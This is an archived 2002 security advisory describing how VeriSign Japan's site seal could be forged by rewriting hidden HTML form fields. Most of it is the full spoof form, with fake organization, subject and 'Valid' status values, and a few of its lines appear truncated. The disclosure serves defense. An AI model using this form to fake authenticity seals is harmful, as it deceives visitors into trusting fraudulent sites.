Falsifying a VeriSign Seal (Japan)

From: Noam Rathaus (noamrat_private)
Date: Tue Jul 02 2002 - 01:32:47 PDT

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    Vagabond has reported a problem in the Japanese version of VeriSign provided
    seals. The problem allows a malicious site owner to create an authenticity
    seal (false one) for his site without it being actually issued by VeriSign.
    VeriSign's Seal displays parameters when it transfers them from the form to
    CGI script. At this point the company name and other information used in
    authentication, which is hidden in the form but displayed when the
    authentication process is complete, is transferred. Thus, the authentication
    window used by VeriSign's seal can be spoofed by preparing a page set with
    the hidden elements containing the information the attacker wants to spoof.
    For your reference, the HTML source code for the form portion is appended at
    the end of this message.
    Which VeriSign's are vulnerable?
    We cannot confirm the problem in VeriSign's other than VeriSign Japan. It
    also should be noted that VeriSign.com (US version) seems to use a different
    method of showing authenticity seals.
    Appended below is the source code for the VeriSign form. Virtually all of
    the hidden information can be rewritten. All of the content rewritten onto
    VeriSign Japan's authentication window is clearly displayed.
    <INPUT type=hidden name="VS_ORGANIZATION" value="USO-DAPYON">
    For example, "USO-DAPYON" in value ="USO-DAPYON" in the above string can be
    displayed by rewriting it to a different character string.
    ACTION="https://www.verisign.co.jp/cgi-bin/Seal.exe"><INPUT type=hidden
    name="VHTML_FILE" value="../htmldocs/query/authCertDisplay.htm">
    <INPUT type=hidden name="STATUS" value="0">
    <INPUT type=hidden name="qmRowOffset" value="">
    <INPUT type=hidden name="qmStartRecNumber" value="">
    <INPUT type=hidden name="qmRecNumber" value="">
    <INPUT type=hidden name="VS_ORGANIZATION" value="USO-DAPYON">
    <INPUT type=hidden name="form_file" value="../fdf/authCertByIssuer.fdf">
    <INPUT type=hidden name="PIPE" value="QUERY_MANAGER">
    <INPUT type=hidden name="VS_VALID_END" value="99-MAR-99">
    <INPUT type=hidden name="qmCompileAlways" value="yes">
    <INPUT type=hidden name="unstructured_addr" value="">
    <INPUT type=hidden name="CERT_MSG" value="">
    <INPUT type=hidden name="VS_CERT_SERIAL" value="">
    <INPUT type=hidden name="VS_CERT_FLAGS" value="0">
    <INPUT type=hidden name="VS_STATUS" value="Valid">
    <INPUT type=hidden name="url_encode" value="no">
    <INPUT type=hidden name="issuerSerial2" value="">
    <INPUT type=hidden name="SDATE" value="">
    <INPUT type=hidden name="ip_address" value="">
    <INPUT type=hidden name="VS_SUBJECT_READABLE" value="Country = JP<BR>State =
    Tokyo<BR>Locality = USO <BR>Organizational Unit = Terms of use at
    www.verisign.co.jp/RPA (c)00<BR>Organizational Unit = Authenticated by
    VeriSign Japan K.K.<BR>Organizational Unit = Member, VeriSign Trust
    Network<BR>Organization = USO Inc.<BR>Organizational Unit = Web System
    Div.<BR>Common Name = www.USO-DAPYON.co.jp">
    <INPUT type=hidden name="qmStartRecNumber" value="1">
    <INPUT type=hidden name="application" value="Mozilla/4.78 [ja] (Windows NT
    5.0; U)">
    <INPUT type=hidden name="qmRecNumber" value="2">
    <INPUT type=hidden name="VS_PRODUCT_NAME" value="Digital ID Class 3 -
    Affiliate Global Server AuthCenter">
    <INPUT type=hidden name="remote_host"
    <INPUT type=hidden name="common_name" value="">
    <INPUT type=hidden name="error_status" value="4000">
    <INPUT type=hidden name="VS_VALID_START" value="99-MAR-99">
    <INPUT type=hidden name="card_expire" value="">
    <INPUT type=hidden name="Template" value="authCertByIssuer">
    <INPUT type=hidden name="issuerSerial" value="">
    <INPUT type=hidden name="ENDDATE" value="">
    <INPUT type=hidden name="server_URL"
    <INPUT type=hidden name="VS_COMMON_NAME" value="WWW.USO-DAPYON.CO.JP">
    <INPUT type=hidden name="END" value="YES">
    <INPUT SRC="https://www.verisign.co.jp/images/siteseal/VeriSignSeal.gif"
    TYPE="image" border=0></FORM>
    The information has been provided by  <http://www.vagabond.co.jp> Vagabond.
    Noam Rathaus
    Beyond Security Ltd.

    This archive was generated by hypermail 2b30 : Tue Jul 02 2002 - 14:25:05 PDT